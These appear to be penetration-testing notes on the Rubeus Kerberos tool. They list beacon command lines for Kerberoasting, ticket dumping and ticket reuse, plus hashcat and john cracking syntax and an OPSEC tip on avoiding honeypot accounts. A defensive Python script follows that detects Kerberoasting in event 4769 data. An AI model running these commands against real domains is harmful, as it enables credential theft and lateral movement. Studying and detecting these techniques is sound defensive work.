Rubeus is a tool for enumerating and abusing Kerberos. See also a detailed guide on Rubeus
Usage
Rubeus.exe [subcommand]
Subcommands
- triage: list all Kerberos tickets in the current logon session (shows all tickets on the machine if elevated)
- dump /luid:[luid] /service:[service name]: dump the ticket identified by the user's LUID (see triage) and service (the service will be krbtgt if the ticket is a TGT); the service is optional
  - add /nowrap to output the hash on one line (makes copying easier)
- add
- Kerberoasting:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
- automatically enumerates all Kerberoastable users and dumps their hashes
- The dumped TGS-REP hashes can be cracked (e.g. using hashcat) to obtain the plaintext password.
  - hashcat: -a 0 -m 13100 [hashes] [wordlist]
  - john: --format=krb5tgs --wordlist=[wordlist] [hashes]
- OPSEC warning: This command finds every Kerberoastable user. If there is an intentionally roastable honeypot account, running the command will be a clear indication of attack to the blue team.
- Alternatively, use ADSearch to enumerate the roastable users, and dump the hash manually:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:[username] /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[tgs-base64]
- 09-lateral-movement use ticket or password to launch program/shell remotely
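
The honeypot account from the OPSEC warning above, seen from the blue team's side. This is an added example, not part of the original notes or of Rubeus: it checks Windows Security event 4769 records from one time window for requests to a decoy account and for one client requesting RC4 (0x17) tickets for many user-account services. The sample events, account names, the decoy `svc_honey` and the threshold are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of event 4769 records (Kerberos service ticket requested),
# reduced to the fields used here. All names and addresses are made up.
EVENTS = [
    {"client": "alice@CORP.LOCAL", "service": "svc_sql", "etype": "0x12", "ip": "10.0.0.21"},
    {"client": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.37"},
    {"client": "bob@CORP.LOCAL", "service": "svc_web", "etype": "0x17", "ip": "10.0.0.37"},
    {"client": "bob@CORP.LOCAL", "service": "svc_backup", "etype": "0x17", "ip": "10.0.0.37"},
    {"client": "bob@CORP.LOCAL", "service": "svc_honey", "etype": "0x17", "ip": "10.0.0.37"},
    {"client": "carol@CORP.LOCAL", "service": "FILESRV01$", "etype": "0x12", "ip": "10.0.0.40"},
]

HONEYPOT_SERVICES = {"svc_honey"}  # assumption: decoy account with an SPN, never used legitimately
RC4_ETYPE = "0x17"                 # RC4-HMAC, the ticket type hashcat mode 13100 works on
BURST_THRESHOLD = 3                # assumption: distinct RC4 services per client in one window


def detect_kerberoasting(events, threshold=BURST_THRESHOLD):
    """Return (honeypot_hits, burst_clients) for one time window of 4769 events."""
    honeypot_hits = []
    rc4_services = defaultdict(set)
    for ev in events:
        svc = ev["service"]
        # Skip machine accounts (random passwords) and krbtgt (not a user service).
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        # Any request for the decoy is a high-confidence signal on its own.
        if svc in HONEYPOT_SERVICES:
            honeypot_hits.append((ev["client"], ev["ip"], svc))
        # Track which user-account services each client asked for with RC4.
        if ev["etype"] == RC4_ETYPE:
            rc4_services[ev["client"]].add(svc)
    burst_clients = {c: sorted(s) for c, s in rc4_services.items() if len(s) >= threshold}
    return honeypot_hits, burst_clients


if __name__ == "__main__":
    hits, bursts = detect_kerberoasting(EVENTS)
    for client, ip, svc in hits:
        print(f"HIGH: {client} ({ip}) requested a ticket for decoy account {svc}")
    for client, services in bursts.items():
        print(f"MEDIUM: {client} requested RC4 tickets for {len(services)} services: {services}")
```

The single-user variant on the page avoids the decoy only if the chosen account is not itself the decoy; the RC4 burst check does not depend on a decoy being present.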